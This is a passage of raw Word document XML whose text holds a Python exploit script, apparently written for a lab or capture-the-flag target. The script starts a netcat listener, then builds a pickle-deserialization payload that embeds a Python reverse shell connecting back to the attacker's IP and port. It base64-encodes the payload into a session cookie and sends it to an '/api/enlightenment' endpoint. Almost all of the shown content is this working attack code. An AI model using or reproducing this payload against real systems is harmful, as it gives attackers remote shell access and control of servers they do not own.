      </w:r>
    </w:p>
    <w:p w14:paraId="4477AFED"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lastRenderedPageBreak/>
        <w:t>╚═════╝░╚══════╝╚═════╝░╚══════╝╚═╝░░╚═╝╚═════╝░╚═╝░░░░░╚══════╝░╚════╝░╚═╝░░░╚═╝░░░</w:t>
      </w:r>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>╯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA4E420"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 "\033[0m")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D06EF9" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153E2E03"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Get user input for the base URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77DD9E" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>base_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = input("\033[92mEnter the base URL (e.g., http://10.X.50.40): \033[0m")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DB689" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D09231"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Define the API endpoint (hardcoded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03853546" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>api_endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/enlightenment"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28597F3F" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C734BF0"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Combine the base URL and API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E34E492" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>base_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>api_endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E31793A" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0464CA"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Get user input for IP address and port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B4E23" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = input("\033[92mEnter your Local IP address: \033[0m")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B114365" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>port_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = input("\033[92mEnter the port number to start a listener: \033[0m")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105359C1" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A6EF7E"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Start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E9F52" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>netcat_listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>subprocess.Popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">", "-l", "-p", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>port_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872F1DD" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB5ACC4"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Encode the malicious code in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B189E3" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>malicious_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = base64.b64encode(b'\x80\x04\x95[\x01\x00\x00\x00\x00\x00\x00\x8c\x13app.models.settings\x94\x8c\x08Settings\x94\x93\x94(\x8c\x10background_value\x94\x8c\x0equestion_value\x94\x8c\x0ffollow_up_value\x94\x8c\x10admin_code_value\x94\x8c\xe3python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip_address.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">() + b'",' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>port_number.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>() + b'));os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(),0); os.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'\x94\x8c\x00\x94t\x94R\x94.').decode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36038329" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCB907D"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Define headers with the encoded malicious code in the Cookie header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72F37B"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headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F3C159"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"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D6359"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"Accept-Encoding": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, deflate, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE93C73"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"Accept": "*/*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC0EFEE"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"Connection": "close",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C14384"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"Host": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>base_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,  # Use the user-provided base URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4818C9"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>base_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">,  # Use the user-provided base URL as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BEBBE59"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"Accept-Language": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>=0.9",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF22263"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"Cookie": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>f"session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>malicious_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}",  # Set the session cookie with the encoded malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E29CD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79365E48" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CBF4EE"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Make the GET request with the session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C802334"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response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>requests.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD36C71" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF3E9EA"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Check the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07619F10"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>response.status_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471FCF67"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print("Request was successful")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A646ACD"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print("Response Content:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6961FFC7"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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>response.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E762B"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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2839A5"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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>f"Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> failed with status code: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>response.status_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3849AD" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396F70C7" w14:textId="77777777" w:rsidR="003715CC" w:rsidRPr="003715CC" w:rsidRDefault="003715CC" w:rsidP="003715CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"># Keep the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F7E27" w14:textId="164787D2" w:rsidR="003715CC" w:rsidRDefault="003715CC" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>netcat_listener.wait</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
